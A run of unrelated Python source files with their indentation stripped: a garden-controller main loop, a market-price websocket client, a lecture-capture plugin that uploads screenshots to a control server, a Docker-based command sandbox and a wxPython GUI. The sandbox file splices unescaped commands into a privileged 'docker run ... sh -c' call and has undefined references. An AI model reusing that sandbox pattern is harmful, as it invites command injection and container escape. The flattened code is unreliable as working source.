elif worker['type'] == "relay":
# Add Relay Worker Here for Better Config Control
print('Loading Pi Relay Worker...')
else:
raise Exception("Unknown Worker Type: " + worker['type'])
pw = pw.run()
if pw is not None:
threads.append(pw)
except KeyError:
print('No Pi Workers Found to Load or Invalid Type')
# Worker for relays attached to pi
try:
for relay in CONFIGS['relays']:
#Create a threading event for each relay to check status
relayState = {
"available": threading.Event(), #Event to allow relay to activate
"active": threading.Event() #Event to signal relay to open/close
}
#Store the relays under the key or index if no key is found, this way we can reference the right relays
relayEvents[relay.get("key", relay_index)] = relayState
#Create sensor worker for a relay
r = RelayWorker(relay, main_thread_running, system_ready, relayState['available'], relayState['active'])
r = r.run()
#Make the relays available, this event is toggled off elsewhere if we need to disable relays
relayState['available'].set()
relay_index +=1
if r is not None:
threads.append(r)
except KeyError:
print('No Relays Found to Load')
# Worker for nodes attached to pi via serial or wifi[esp8266]
# Supported nodes: arduinos, esp8266, ADC-MCP3xxx, probably others
try:
for node in CONFIGS['nodes']:
# Create worker for node
if node['type'] == "arduino":
if NANPY_ENABLED:
t = ArduinoWorker(node, main_thread_running, system_ready)
else:
print('Error Loading Nanpy library. Did you pip3 install -r requirements.txt?')
elif node['type'] == "ADC-MCP3008":
if MCP_ENABLED:
t = ADCMCP3008Worker(node, main_thread_running, system_ready)
else:
print('Error Loading MCP3xxx library. Did you pip3 install -r requirements.txt;?')
else:
raise Exception("Unknown Node Type: " + node['type'])
t = t.run()
if t is not None:
threads.append(t)
except KeyError:
print('Invalid or no Nodes found to Load')
# Load in Actions
try:
for action in CONFIGS["actions"]:
a = Action(action)
a.init_action()
actions[a.key] = a
except KeyError:
print('No Actions Found to Load')
# Worker for Triggers
try:
t = TriggerWorker(CONFIGS['triggers'], main_thread_running, system_ready, actions)
print('Loading Triggers...')
t = t.run()
threads.append(t)
except KeyError:
print('No Triggers Found to Load')
#Decided not to build server worker (this is replaced with nodejs, expressjs)
#Maybe use this for internal communication across devices if using wireless
def server_worker():
server.listen()
print('MudPi Server...\t\t\t\t\033[1;33m Starting\033[0;0m', end='\r', flush=True)
time.sleep(1)
server = MudpiServer(main_thread_running, CONFIGS['server']['host'], CONFIGS['server']['port'])
s = threading.Thread(target=server_worker)
threads.append(s)
s.start()
time.sleep(.5)
print('MudPi Garden Control...\t\t\t\033[1;32m Online\033[0;0m')
print('_________________________________________________')
system_ready.set() #Workers will not process until system is ready
variables.r.set('started_at', str(datetime.datetime.now())) #Store current time to track uptime
system_message = {'event':'SystemStarted', 'data':1}
variables.r.publish('mudpi', json.dumps(system_message))
#Hold the program here until its time to graceful shutdown
#This is our pump cycle check, Using redis to determine if pump should activate
while PROGRAM_RUNNING:
# Main program loop
# add logging or other system operations here...
time.sleep(0.1)
except KeyboardInterrupt:
PROGRAM_RUNNING = False
finally:
print('MudPi Shutting Down...')
#Perform any cleanup tasks here...
#load a client on the server to clear it from waiting
# sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#sock.connect((CONFIGS['SERVER_HOST'], int(CONFIGS['SERVER_PORT'])))
server.sock.shutdown(socket.SHUT_RDWR)
# time.sleep(1)
# sock.close()
#Clear main running event to signal threads to close
main_thread_running.clear()
#Shutdown the camera loop
camera_available.clear()
#Join all our threads for shutdown
for thread in threads:
thread.join()
print("MudPi Shutting Down...\t\t\t\033[1;32m Complete\033[0;0m")
print("Mudpi is Now...\t\t\t\t\033[1;31m Offline\033[0;0m")
|
market_price.py | #|-----------------------------------------------------------------------------
#| This source code is provided under the Apache 2.0 license --
#| and is provided AS IS with no warranty or guarantee of fit for purpose. --
#| See the project's LICENSE.md for details. --
#| Copyright Thomson Reuters 2017. All rights reserved. --
#|-----------------------------------------------------------------------------
#!/usr/bin/env python
""" Simple example of outputting Market Price JSON data using Websockets """
import sys
import time
import getopt
import socket
import json
import websocket
import threading
from threading import Thread, Event
# Global Default Variables
hostname = '127.0.0.1'
port = '15000'
user = 'root'
app_id = '256'
position = socket.gethostbyname(socket.gethostname())
# Global Variables
web_socket_app = None
web_socket_open = False
def process_message(ws, message_json):
""" Parse at high level and output JSON of message """
message_type = message_json['Type']
if message_type == "Refresh":
if 'Domain' in message_json:
message_domain = message_json['Domain']
if message_domain == "Login":
process_login_response(ws, message_json)
elif message_type == "Ping":
pong_json = { 'Type':'Pong' }
ws.send(json.dumps(pong_json))
print("SENT:")
print(json.dumps(pong_json, sort_keys=True, indent=2, separators=(',', ':')))
def process_login_response(ws, message_json):
""" Send item request """
send_market_price_request(ws)
def send_market_price_request(ws):
""" Create and send simple Market Price request """
mp_req_json = {
'ID': 2,
'Key': {
'Name': 'TRI.N',
},
}
ws.send(json.dumps(mp_req_json))
print("SENT:")
print(json.dumps(mp_req_json, sort_keys=True, indent=2, separators=(',', ':')))
def send_login_request(ws):
""" Generate a login request from command line data (or defaults) and send """
login_json = {
'ID': 1,
'Domain': 'Login',
'Key': {
'Name': '',
'Elements': {
'ApplicationId': '',
'Position': ''
}
}
}
login_json['Key']['Name'] = user
login_json['Key']['Elements']['ApplicationId'] = app_id
login_json['Key']['Elements']['Position'] = position
ws.send(json.dumps(login_json))
print("SENT:")
print(json.dumps(login_json, sort_keys=True, indent=2, separators=(',', ':')))
def on_message(ws, message):
""" Called when message received, parse message into JSON for processing """
print("RECEIVED: ")
message_json = json.loads(message)
print(json.dumps(message_json, sort_keys=True, indent=2, separators=(',', ':')))
for singleMsg in message_json:
process_message(ws, singleMsg)
def on_error(ws, error):
""" Called when websocket error has occurred """
print(error)
def on_close(ws):
""" Called when websocket is closed """
global web_socket_open
print("WebSocket Closed")
web_socket_open = False
def on_open(ws):
""" Called when handshake is complete and websocket is open, send login """
print("WebSocket successfully connected!")
global web_socket_open
web_socket_open = True
send_login_request(ws)
if __name__ == "__main__":
# Get command line parameters
try:
opts, args = getopt.getopt(sys.argv[1:], "", ["help", "hostname=", "port=", "app_id=", "user=", "position="])
except getopt.GetoptError:
print('Usage: market_price.py [--hostname hostname] [--port port] [--app_id app_id] [--user user] [--position position] [--help]')
sys.exit(2)
for opt, arg in opts:
if opt in ("--help"):
print('Usage: market_price.py [--hostname hostname] [--port port] [--app_id app_id] [--user user] [--position position] [--help]')
sys.exit(0)
elif opt in ("--hostname"):
hostname = arg
elif opt in ("--port"):
port = arg
elif opt in ("--app_id"):
app_id = arg
elif opt in ("--user"):
user = arg
elif opt in ("--position"):
position = arg
# Start websocket handshake
ws_address = "ws://{}:{}/WebSocket".format(hostname, port)
print("Connecting to WebSocket " + ws_address + " ...")
web_socket_app = websocket.WebSocketApp(ws_address, header=['User-Agent: Python'],
on_message=on_message,
on_error=on_error,
on_close=on_close,
subprotocols=['tr_json2'])
web_socket_app.on_open = on_open
# Event loop
wst = threading.Thread(target=web_socket_app.run_forever)
wst.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
web_socket_app.close()
|
ddp.py | # DDP galicaster plugin
#
# Source:
# github SussexLearningSystems/peakaboo
# /docs/capture_agent_plugins/examples/galicaster_2_manchester/ddp.py
# Commit: 484abe9
#
# Copyright (c) 2016 University of Sussex
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# import calendar
import cStringIO
import requests
# import socket
from threading import Thread
import time
import uuid
from gi.repository import Gdk
from MeteorClient import MeteorClient
import pyscreenshot as ImageGrab
from PIL import Image
from galicaster.core import context
conf = context.get_conf()
dispatcher = context.get_dispatcher()
logger = context.get_logger()
def init():
ddp = DDP()
ddp.start()
class DDP(Thread):
def __init__(self):
Thread.__init__(self)
self.meteor = conf.get('ddp', 'meteor')
self.client = MeteorClient(self.meteor, debug=False)
self.client.on('added', self.on_added)
self.client.on('changed', self.on_changed)
self.client.on('subscribed', self.on_subscribed)
self.client.on('connected', self.on_connected)
self.client.on('removed', self.on_removed)
self.client.on('closed', self.on_closed)
self.client.on('logged_in', self.on_logged_in)
self.displayName = conf.get('ddp', 'room_name')
self.vu_min = -50
self.vu_range = 50
self.vu_data = 0
self.last_vu = None
self.ip = conf.get('ingest', 'address')
self.id = conf.get('ingest', 'hostname')
self._user = conf.get('ddp', 'user')
self._password = conf.get('ddp', 'password')
self._http_host = conf.get('ddp', 'http_host')
self._audiostream_port = conf.get('audiostream', 'port') or 31337
self.store_audio = conf.get_boolean('ddp', 'store_audio')
self.screenshot_file = conf.get('ddp', 'existing_screenshot')
self.high_quality = conf.get_boolean('ddp', 'hq_snapshot')
self.paused = False
self.recording = False
self.currentMediaPackage = None
self.currentProfile = None
self.has_disconnected = False
screen = Gdk.Screen.get_default()
self._screen_width = screen.get_width()
self._screen_height = screen.get_height()
self.cardindex = None
cam_available = conf.get(
'ddp',
'cam_available') or 0
if cam_available in ('True', 'true', True, '1', 1):
self.cam_available = 1
elif cam_available in ('False', 'false', False, '0', 0):
self.cam_available = 0
else:
self.cam_available = int(cam_available)
# Getting audiostream params. either using existing audiostreaming server like icecast or the audiostream plugin
if conf.get('ddp', 'existing_stream_host'):
self._stream_host = conf.get('ddp', 'existing_stream_host')
else:
self._stream_host = self.ip
if conf.get_int('ddp', 'existing_stream_port'):
self._audiostream_port = conf.get_int('ddp', 'existing_stream_port')
else:
self._audiostream_port = conf.get_int('audiostream', 'port') or 31337
if conf.get('ddp', 'existing_stream_key'):
self.stream_key = conf.get('ddp', 'existing_stream_key')
else:
self.stream_key = uuid.uuid4().get_hex()
if conf.get('ddp', 'extra_params'):
self.extra_params_list = conf.get('ddp', 'extra_params').split(';')
else:
self.extra_params_list = []
logger.info('audiostream URI: {}'.format('http://' + self._stream_host + ':' + str(self._audiostream_port) + '/' + self.stream_key))
dispatcher.connect('init', self.on_init)
dispatcher.connect('recorder-vumeter', self.vumeter)
dispatcher.connect('timer-short', self.update_vu)
dispatcher.connect('timer-short', self.heartbeat)
dispatcher.connect('recorder-started', self.on_start_recording)
dispatcher.connect('recorder-stopped', self.on_stop_recording)
dispatcher.connect('recorder-status', self.on_rec_status_update)
def run(self):
self.connect()
def connect(self):
if not self.has_disconnected:
try:
self.client.connect()
except Exception:
logger.warn('DDP connection failed')
def update(self, collection, query, update):
if self.client.connected and self.subscribedTo('GalicasterControl'):
try:
self.client.update(
collection,
query,
update,
callback=self.update_callback)
except Exception:
logger.warn(
"Error updating document "
"{collection: %s, query: %s, update: %s}" %
(collection, query, update))
def insert(self, collection, document):
if self.client.connected and self.subscribedTo('GalicasterControl'):
try:
self.client.insert(
collection,
document,
callback=self.insert_callback)
except Exception:
logger.warn(
"Error inserting document {collection: %s, document: %s}" %
(collection, document))
def heartbeat(self, element):
if self.client.connected:
self.update_images()
else:
self.connect()
def on_start_recording(self, sender, id):
self.recording = True
self.currentMediaPackage = self.media_package_metadata(id)
self.currentProfile = conf.get_current_profile().name
self.update(
'rooms', {
'_id': self.id
}, {
'$set': {
'currentMediaPackage': self.currentMediaPackage,
'currentProfile': self.currentProfile,
'recording': self.recording
}
})
def on_stop_recording(self, mpid, sender=None):
self.recording = False
self.currentMediaPackage = None
self.currentProfile = None
self.update(
'rooms', {
'_id': self.id
}, {
'$unset': {
'currentMediaPackage': '',
'currentProfile': ''
}, '$set': {
'recording': self.recording
}
})
self.update_images(1.5)
def on_init(self, data):
self.update_images(1.5)
def update_images(self, delay=0.0):
worker = Thread(target=self._update_images, args=(delay,))
worker.start()
def _update_images(self, delay):
time.sleep(delay)
files = {}
if not self.screenshot_file:
# take a screenshot with pyscreenshot
im = ImageGrab.grab(bbox=(0, 0, self._screen_width, self._screen_height), backend='imagemagick')
else:
try:
# used if screenshot already exists
im = Image.open(self.screenshot_file)
except IOError:
logger.warn("Unable to open screenshot file {0}".format(self.screenshot_file))
return
output = cStringIO.StringIO()
image_format = 'JPEG'
if not self.high_quality:
im.thumbnail((640, 360), Image.ANTIALIAS)
else:
image_format = 'PNG'
if im.mode != "RGB":
im = im.convert("RGB")
im.save(output, format=image_format) # to reduce jpeg size use param: optimize=True
files['galicaster'] = ('galicaster.jpg', output.getvalue(),
'image/jpeg')
try:
# add verify=False for testing self signed certs
requests.post(
"%s/image/%s" %
(self._http_host, self.id), files=files, auth=(
self._user, self._password)) # to ignore ssl verification, use param: verify=False
except Exception:
logger.warn('Unable to post images')
def vumeter(self, element, data, data_chan2, vu_bool):
if data == "Inf":
data = 0
else:
if data < -self.vu_range:
data = -self.vu_range
elif data > 0:
data = 0
self.vu_data = int(((data + self.vu_range) / float(self.vu_range)) * 100)
def update_vu(self, element):
if self.vu_data != self.last_vu:
update = {'vumeter': self.vu_data}
self.update('rooms', {'_id': self.id}, {'$set': update})
self.last_vu = self.vu_data
def on_rec_status_update(self, element, data):
if data == 'paused':
is_paused = True
else:
is_paused = False
if is_paused:
self.update_images(.75)
if self.paused == is_paused:
self.update(
'rooms', {
'_id': self.id}, {
'$set': {
'paused': is_paused}})
self.paused = is_paused
if data == 'recording':
self.update_images(.75)
def media_package_metadata(self, id):
mp = context.get('recorder').current_mediapackage
line = mp.metadata_episode
duration = mp.getDuration()
line["duration"] = long(duration / 1000) if duration else None
# FIXME Does series_title need sanitising as well as duration?
# created = mp.getDate()
# line["created"] = calendar.timegm(created.utctimetuple())
for key, value in mp.metadata_series.iteritems():
line["series_" + key] = value
for key, value in line.iteritems():
if value in [None, []]:
line[key] = ''
# return line
return line
def subscription_callback(self, error):
if error:
logger.warn("Subscription callback returned error: %s" % error)
def insert_callback(self, error, data):
if error:
logger.warn("Insert callback returned error: %s" % error)
def update_callback(self, error, data):
if error:
logger.warn("Update callback returned error: %s" % error)
def on_subscribed(self, subscription):
if(subscription == 'GalicasterControl'):
me = self.client.find_one('rooms')
# Data to push when inserting or updating
data = {
'displayName': self.displayName,
'ip': self.ip,
'paused': self.paused,
'recording': self.recording,
'heartbeat': int(time.time()),
'camAvailable': self.cam_available,
'inputs': self.inputs(),
'stream': {
'host': self._stream_host,
'port': self._audiostream_port,
'key': self.stream_key
}
}
# Parse extra Meteor Mongodb collection elements and append
for params in self.extra_params_list:
param = params.split(':')
data[param[0]] = param[1]
if self.currentMediaPackage:
data['currentMediaPackage'] = self.currentMediaPackage
if self.currentProfile:
data['currentProfile'] = self.currentProfile
if me:
# Items to unset
unset = {}
if not self.currentMediaPackage:
unset['currentMediaPackage'] = ''
if not self.currentProfile:
unset['currentProfile'] = ''
# Update to push
update = {
'$set': data
}
if unset:
update['$unset'] = unset
self.update('rooms', {'_id': self.id}, update)
else:
data['_id'] = self.id
self.insert('rooms', data)
def inputs(self):
inputs = {
'presentations': ['Presentation']
}
inputs['cameras'] = []
labels = conf.get('ddp', 'cam_labels')
cam_labels = []
if labels:
cam_labels = [l.strip() for l in labels.split(',')]
for i in range(0, self.cam_available):
label = cam_labels[i] if i < len(
cam_labels) else "Camera %d" % (i + 1)
inputs['cameras'].append(label)
return inputs
def on_added(self, collection, id, fields):
pass
def on_changed(self, collection, id, fields, cleared):
me = self.client.find_one('rooms')
if self.paused != me['paused']:
self.set_paused(me['paused'])
if context.get('recorder').is_recording() != me['recording']:
self.set_recording(me)
def on_removed(self, collection, id):
self.on_subscribed(None)
def set_paused(self, new_status):
if not self.paused:
self.paused = new_status
context.get('recorder').pause()
else:
self.paused = False
context.get('recorder').resume()
def set_recording(self, me):
self.recording = me['recording']
if self.recording:
# FIXME: Metadata isn't passed to recorder
# meta = me.get('currentMediaPackage', {}) or {}
# profile = me.get('currentProfile', 'nocam')
# series = (meta.get('series_title', ''), meta.get('isPartOf', ''))
# user = {'user_name': meta.get('creator', ''),
# 'user_id': meta.get('rightsHolder', '')}
# title = meta.get('title', 'Unknown')
context.get('recorder').record()
else:
context.get('recorder').stop()
def on_connected(self):
logger.info('Connected to Meteor')
token = conf.get('ddp', 'token')
self.client.login(self._user, self._password, token=token)
def on_logged_in(self, data):
conf.set('ddp', 'token', data['token'])
conf.update()
try:
self.client.subscribe(
'GalicasterControl',
params=[
self.id],
callback=self.subscription_callback)
except Exception:
logger.warn('DDP subscription failed')
def on_closed(self, code, reason):
self.has_disconnected = True
logger.error('Disconnected from Meteor: err %d - %s' % (code, reason))
def subscribedTo(self, publication):
return self.client.subscriptions.get(publication) is not None
|
sandbox.py | #!/usr/bin/python
from __future__ import print_function
import os
import shlex
import signal
import subprocess
import sys
import time
from optparse import OptionParser
from threading import Thread
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty
# make python 3.x compatible with python 2.x
if sys.version_info >= (3,):
def unicode(s, errors="strict"):
if isinstance(s, str):
return s
elif isinstance(s, bytes) or isinstance(s, bytearray):
return s.decode("utf-8", errors)
raise SandboxError("Tried to convert unrecognized type to unicode")
class SandboxError(Exception):
pass
def _guard_monitor(jail):
guard_out = jail.command_process.stdout
while True:
line = guard_out.readline()
if not line:
end_item = (time.time(), None)
jail.resp_queue.put(end_item)
jail.stdout_queue.put(end_item)
jail.stderr_queue.put(end_item)
break
line = line.rstrip("\r\n")
words = line.split(None, 2)
if len(words) < 3:
msg, ts = words
data = ""
else:
msg, ts, data = words
ts = float(ts)
data = unicode(data, errors="replace")
if msg == "STDOUT":
jail.stdout_queue.put((time, data))
elif msg == "STDERR":
jail.stderr_queue.put((time, data))
elif msg == "SIGNALED":
jail.resp_queue.put((time, data))
def _monitor_file(fd, q):
print("Start monitor")
while True:
line = fd.readline()
print(line)
if not line:
q.put(None)
break
line = unicode(line, errors="replace")
line = line.rstrip('\r\n')
q.put(line)
class Sandbox:
def __init__(self, working_directory):
"""Initialize a new sandbox for the given working directory.
working_directory: the directory in which the shell command should
be launched.
"""
self._is_alive = False
self.command_process = None
self.stdout_queue = Queue()
self.stderr_queue = Queue()
self.working_directory = working_directory
@property
def is_alive(self):
"""Indicates whether a command is currently running in the sandbox"""
if self._is_alive:
sub_result = self.command_process.poll()
if sub_result is None:
return True
self.child_queue.put(None)
self._is_alive = False
return False
def start(self, shell_command):
"""Start a command running in the sandbox"""
shell_command = "docker run -v /var/www/nycsl/problems/workers/workingPath:/var/www/nycsl/problems/workers/workingPath --privileged=true virtual_machine sh -c \'" + shell_command + "\'"
print("Shell command")
print(shell_command)
if self.is_alive:
raise SandboxError("Tried to run command with one in progress.")
working_directory = self.working_directory
self.child_queue = Queue()
shell_command = shlex.split(shell_command.replace('\\','/'))
try:
self.command_process = subprocess.Popen(shell_command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
cwd=working_directory)
except OSError:
print("There was an error")
raise SandboxError('Failed to start {0}'.format(shell_command))
self._is_alive = True
stdout_monitor = Thread(target=_monitor_file,
args=(self.command_process.stdout, self.stdout_queue))
stdout_monitor.daemon = True
stdout_monitor.start()
stderr_monitor = Thread(target=_monitor_file,
args=(self.command_process.stderr, self.stderr_queue))
stderr_monitor.daemon = True
stderr_monitor.start()
Thread(target=self._child_writer).start()
def kill(self):
"""Stops the sandbox.
Shuts down the sandbox, cleaning up any spawned processes, threads, and
other resources. The shell command running inside the sandbox may be
suddenly terminated.
"""
if self.is_alive:
try:
self.command_process.kill()
except OSError:
pass
self.command_process.wait()
self.child_queue.put(None)
def retrieve(self):
"""Copy the working directory back out of the sandbox."""
if self.is_alive:
raise SandboxError("Tried to retrieve sandbox while still alive")
pass
def release(self):
"""Release the sandbox for further use
If running in a jail unlocks and releases the jail for reuse by others.
Must be called exactly once after Sandbox.kill has been called.
"""
if self.is_alive:
raise SandboxError("Sandbox released while still alive")
pass
def pause(self):
"""Pause the process by sending a SIGSTOP to the child
A limitation of the method is it will only pause the initial
child process created any further (grandchild) processes created
will not be paused.
This method is a no-op on Windows.
"""
try:
self.command_process.send_signal(signal.SIGSTOP)
except (ValueError, AttributeError, OSError):
pass
def resume(self):
"""Resume the process by sending a SIGCONT to the child
This method is a no-op on Windows
"""
try:
self.command_process.send_signal(signal.SIGCONT)
except (ValueError, AttributeError, OSError):
pass
def _child_writer(self):
queue = self.child_queue
stdin = self.command_process.stdin
while True:
ln = queue.get()
if ln is None:
break
try:
stdin.write(ln)
stdin.flush()
except (OSError, IOError):
self.kill()
break
def write(self, str):
"""Write str to stdin of the process being run"""
if not self.is_alive:
return False
self.child_queue.put(str)
def write_line(self, line):
"""Write line to stdin of the process being run
A newline is appended to line and written to stdin of the child process
"""
if not self.is_alive:
return False
self.child_queue.put(line + "\n")
def read_line(self, timeout=0):
"""Read line from child process
Returns a line of the child process' stdout, if one isn't available
within timeout seconds it returns None. Also guaranteed to return None
at least once after each command that is run in the sandbox.
"""
time.sleep(0.1)
if not self.is_alive:
timeout=0
try:
return self.stdout_queue.get(block=True, timeout=timeout)
except Empty:
return None
def read_error(self, timeout=0):
"""Read line from child process' stderr
Returns a line of the child process' stderr, if one isn't available
within timeout seconds it returns None. Also guaranteed to return None
at least once after each command that is run in the sandbox.
"""
if not self.is_alive:
timeout=0
try:
return self.stderr_queue.get(block=True, timeout=timeout)
except Empty:
return None
def check_path(self, path, errors):
resolved_path = os.path.join(self.working_directory, path)
if not os.path.exists(resolved_path):
errors.append("Output file " + str(path) + " was not created.")
return False
else:
return True
def get_sandbox(working_dir, secure=None):
return Sandbox(working_dir)
if __name__ == "__main__":
main()
|
thread_test.py | import threading
import time
from threading import current_thread
def myThread(arg1, arg2):
print(current_thread().getName, 'start')
print('%s %s'%(arg1, arg2))
time.sleep(1)
print(current_thread().getName, 'stop')
for i in range(1, 6, 1):
t1 = threading.Thread(target=myThread, args=(i, i+1))
t1.start() # 运行程序
# t1 = myThreayd(i, i + 1)
print(current_thread().getName(), 'end')
|
gui.py | from __future__ import unicode_literals
import Queue
import datetime
import errno
import gettext
import itertools
import json
import locale
import os
import subprocess
import sys
import threading
import wx
import openslides
from openslides.utils.main import (
detect_openslides_type,
filesystem2unicode,
unicode2filesystem,
get_default_user_data_path,
get_port,
PortableDirNotWritable,
)
# NOTE: djangos translation module can't be used here since it requires
# a defined settings module
_translations = gettext.NullTranslations()
_ = lambda text: _translations.ugettext(text)
ungettext = lambda msg1, msg2, n: _translations.ungettext(msg1, msg2, n)
def get_data_path(*args):
path = filesystem2unicode(__file__)
return os.path.join(os.path.dirname(path), "data", *args)
class RunCmdEvent(wx.PyCommandEvent):
def __init__(self, evt_type, evt_id):
super(RunCmdEvent, self).__init__(evt_type, evt_id)
self.running = False
self.exitcode = None
EVT_RUN_CMD_ID = wx.NewEventType()
EVT_RUN_CMD = wx.PyEventBinder(EVT_RUN_CMD_ID, 1)
class RunCommandControl(wx.Panel):
UPDATE_INTERVAL = 500
def __init__(self, parent):
super(RunCommandControl, self).__init__(parent)
self.child_process = None
self.output_queue = Queue.Queue()
self.output_read_thread = None
self.canceled = False
self.output_mutex = threading.RLock()
vbox = wx.BoxSizer(wx.VERTICAL)
self.te_output = wx.TextCtrl(
self, style=wx.TE_MULTILINE | wx.TE_READONLY | wx.HSCROLL)
vbox.Add(self.te_output, 1, wx.EXPAND)
self.update_timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.on_update_timer, self.update_timer)
self.SetSizerAndFit(vbox)
def _read_output(self):
while True:
# NOTE: don't use iterator interface since it uses an
# internal buffer and we don't see output in a timely fashion
line = self.child_process.stdout.readline()
if not line:
break
self.output_queue.put(line)
def is_alive(self):
if self.child_process is None:
return False
return self.child_process.poll() is None
def run_command(self, *args):
if self.is_alive():
raise ValueError("already running a command")
cmd = [sys.executable, "-u", "-m", "openslides"]
cmd.extend(args)
# XXX: subprocess on windows only handles byte strings
# with python3 this will hopefully no longer be the case
cmd = [unicode2filesystem(x) for x in cmd]
creationflags = getattr(subprocess, "CREATE_NEW_PROCESS_GROUP", 0)
self.child_process = subprocess.Popen(
cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, creationflags=creationflags)
self.child_process.stdin.close()
self.output_read_thread = threading.Thread(target=self._read_output)
self.output_read_thread.start()
self.update_timer.Start(self.UPDATE_INTERVAL)
evt = RunCmdEvent(EVT_RUN_CMD_ID, self.GetId())
evt.running = True
self.GetEventHandler().ProcessEvent(evt)
def cancel_command(self):
if not self.is_alive():
return
# TODO: try sigint first, then get more aggressive if user insists
self.child_process.kill()
self.canceled = True
def on_update_timer(self, evt):
is_alive = self.is_alive()
if not is_alive:
# join thread to make sure everything was read
self.output_read_thread.join()
self.output_read_thread = None
for line_no in itertools.count():
try:
data = self.output_queue.get(block=False)
except Queue.Empty:
break
else:
# XXX: check whether django uses utf-8 or locale for
# it's cli output
text = data.decode("utf-8", errors="replace")
with self.output_mutex:
self.te_output.AppendText(text)
# avoid waiting too long here if child is still alive
if is_alive and line_no > 10:
break
if not is_alive:
exitcode = self.child_process.returncode
self.update_timer.Stop()
self.child_process = None
evt = RunCmdEvent(EVT_RUN_CMD_ID, self.GetId())
evt.running = False
evt.exitcode = exitcode
self.GetEventHandler().ProcessEvent(evt)
def append_message(self, text, newline="\n"):
with self.output_mutex:
self.te_output.AppendText(text + newline)
class SettingsDialog(wx.Dialog):
def __init__(self, parent):
super(SettingsDialog, self).__init__(parent, wx.ID_ANY, _("Settings"))
grid = wx.GridBagSizer(5, 5)
row = 0
lb_host = wx.StaticText(self, label=_("&Host:"))
grid.Add(lb_host, pos=(row, 0))
self.tc_host = wx.TextCtrl(self)
grid.Add(self.tc_host, pos=(row, 1), flag=wx.EXPAND)
row += 1
lb_port = wx.StaticText(self, label=_("&Port:"))
grid.Add(lb_port, pos=(row, 0))
self.tc_port = wx.TextCtrl(self)
grid.Add(self.tc_port, pos=(row, 1), flag=wx.EXPAND)
row += 1
sizer = self.CreateButtonSizer(wx.OK | wx.CANCEL)
if not sizer is None:
grid.Add((0, 0), pos=(row, 0), span=(1, 2))
row += 1
grid.Add(sizer, pos=(row, 0), span=(1, 2))
box = wx.BoxSizer(wx.VERTICAL)
box.Add(
grid, flag=wx.EXPAND | wx.ALL | wx.ALIGN_CENTER_VERTICAL,
border=5, proportion=1)
self.SetSizerAndFit(box)
@property
def host(self):
return self.tc_host.GetValue()
@host.setter
def host(self, host):
self.tc_host.SetValue(host)
@property
def port(self):
return self.tc_port.GetValue()
@port.setter
def port(self, port):
self.tc_port.SetValue(port)
class BackupSettingsDialog(wx.Dialog):
# NOTE: keep order in sync with _update_interval_choices()
_INTERVAL_UNITS = ["second", "minute", "hour"]
def __init__(self, parent):
super(BackupSettingsDialog, self).__init__(
parent, wx.ID_ANY, _("Database backup"))
self._interval_units = {}
grid = wx.GridBagSizer(5, 5)
row = 0
self.cb_backup = wx.CheckBox(
self, label=_("&Regularly backup database"))
self.cb_backup.SetValue(True)
self.cb_backup.Bind(wx.EVT_CHECKBOX, self.on_backup_checked)
grid.Add(self.cb_backup, pos=(row, 0), span=(1, 3))
row += 1
lb_dest = wx.StaticText(self, label=_("&Destination:"))
grid.Add(lb_dest, pos=(row, 0))
style = wx.FLP_SAVE | wx.FLP_USE_TEXTCTRL
self.fp_dest = wx.FilePickerCtrl(self, style=style)
grid.Add(self.fp_dest, pos=(row, 1), span=(1, 2), flag=wx.EXPAND)
row += 1
lb_interval = wx.StaticText(self, label=_("&Every"))
grid.Add(lb_interval, pos=(row, 0))
self.sb_interval = wx.SpinCtrl(self, min=1, initial=1)
self.sb_interval.Bind(wx.EVT_SPINCTRL, self.on_interval_changed)
grid.Add(self.sb_interval, pos=(row, 1))
self.ch_interval_unit = wx.Choice(self)
grid.Add(self.ch_interval_unit, pos=(row, 2))
row += 1
grid.AddGrowableCol(1)
sizer = self.CreateButtonSizer(wx.OK | wx.CANCEL)
if not sizer is None:
grid.Add((0, 0), pos=(row, 0), span=(1, 3))
row += 1
grid.Add(sizer, pos=(row, 0), span=(1, 3))
box = wx.BoxSizer(wx.VERTICAL)
box.Add(
grid, flag=wx.EXPAND | wx.ALL | wx.ALIGN_CENTER_VERTICAL,
border=5, proportion=1)
self.SetSizerAndFit(box)
self._update_interval_choices()
self._update_backup_enabled()
@property
def backupdb_enabled(self):
return self.cb_backup.GetValue()
@backupdb_enabled.setter
def backupdb_enabled(self, enabled):
self.cb_backup.SetValue(enabled)
self._update_backup_enabled()
@property
def backupdb_destination(self):
return self.fp_dest.GetPath()
@backupdb_destination.setter
def backupdb_destination(self, path):
self.fp_dest.SetPath(path)
@property
def interval(self):
return self.sb_interval.GetValue()
@interval.setter
def interval(self, value):
self.sb_interval.SetValue(value)
self._update_interval_choices()
@property
def interval_unit(self):
return self._INTERVAL_UNITS[self.ch_interval_unit.GetSelection()]
@interval_unit.setter
def interval_unit(self, unit):
try:
idx = self._INTERVAL_UNITS.index(unit)
except IndexError:
raise ValueError("Unknown unit {0}".format(unit))
self.ch_interval_unit.SetSelection(idx)
def _update_interval_choices(self):
count = self.sb_interval.GetValue()
choices = [
ungettext("second", "seconds", count),
ungettext("minute", "minutes", count),
ungettext("hour", "hours", count),
]
current = self.ch_interval_unit.GetSelection()
if current == wx.NOT_FOUND:
current = 2 # default to hour
self.ch_interval_unit.Clear()
